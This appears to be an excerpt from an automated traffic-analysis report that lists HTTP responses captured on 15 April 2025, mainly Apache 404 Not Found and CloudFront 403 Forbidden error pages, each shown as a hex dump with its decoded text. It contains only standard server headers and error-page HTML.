Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:57:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:57:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:57:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:57:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:57:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:57:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 15 Apr 2025 11:57:32 GMTContent-Type: text/htmlContent-Length: 1053Connection: closeX-Cache: Error from cloudfrontVia: 1.1 53e45418f723fbc933ec02c27067d9ea.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL58-P10X-Amz-Cf-Id: cp1-tTnIrAe5JJlaRX-OCyyAReZBncOZAC3eUzksObjlByoLPqwIcg==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 54 68 69 73 20 64 69 73 74 72 69 62 75 74 69 6f 6e 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 74 6f 20 61 6c 6c 6f 77 20 74 68 65 20 48 54 54 50 20 72 65 71 75 65 73 74 20 6d 65 74 68 6f 64 20 74 68 61 74 20 77 61 73 20 75 73 65 64 20 66 6f 72 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 20 54 68 65 20 64 69 73 74 72 69 62 75 74 69 6f 6e 20 73 75 70 70 6f 72 74 73 20 6f 6e 6c 79 20 63 61 63 68 61 62 6c 65 20 72 65 71 75 65 73 74 73 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 15 Apr 2025 11:57:34 GMTContent-Type: text/htmlContent-Length: 1053Connection: closeX-Cache: Error from cloudfrontVia: 1.1 ae84994a7714b65dcc4ade192a2152b6.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL58-P10X-Amz-Cf-Id: 9SkvdCRYolhdeDASAvLxPg9DNvH2XJl2ijkT2m1kVyfgykto_nCesg==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 54 68 69 73 20 64 69 73 74 72 69 62 75 74 69 6f 6e 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 74 6f 20 61 6c 6c 6f 77 20 74 68 65 20 48 54 54 50 20 72 65 71 75 65 73 74 20 6d 65 74 68 6f 64 20 74 68 61 74 20 77 61 73 20 75 73 65 64 20 66 6f 72 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 20 54 68 65 20 64 69 73 74 72 69 62 75 74 69 6f 6e 20 73 75 70 70 6f 72 74 73 20 6f 6e 6c 79 20 63 61 63 68 61 62 6c 65 20 72 65 71 75 65 73 74 73 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 15 Apr 2025 11:57:37 GMTContent-Type: text/htmlContent-Length: 1053Connection: closeX-Cache: Error from cloudfrontVia: 1.1 53e45418f723fbc933ec02c27067d9ea.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL58-P10X-Amz-Cf-Id: p1Q3gQHwrjOz_2e6GrBADSG3Dym3bNv55-GnOjiFDkI32nK5CwpAxg==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 54 68 69 73 20 64 69 73 74 72 69 62 75 74 69 6f 6e 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 74 6f 20 61 6c 6c 6f 77 20 74 68 65 20 48 54 54 50 20 72 65 71 75 65 73 74 20 6d 65 74 68 6f 64 20 74 68 61 74 20 77 61 73 20 75 73 65 64 20 66 6f 72 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 20 54 68 65 20 64 69 73 74 72 69 62 75 74 69 6f 6e 20 73 75 70 70 6f 72 74 73 20 6f 6e 6c 79 20 63 61 63 68 61 62 6c 65 20 72 65 71 75 65 73 74 73 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 15 Apr 2025 11:57:40 GMTContent-Type: text/htmlContent-Length: 915Connection: closeX-Cache: Error from cloudfrontVia: 1.1 309b810a71e0028db034c38e1c6eca7e.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL58-P10X-Amz-Cf-Id: LtGGKRi9NqeRk2B6fxPitSGjyox9OBDxNkNoLcJiSERjIkX86JEH0Q==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 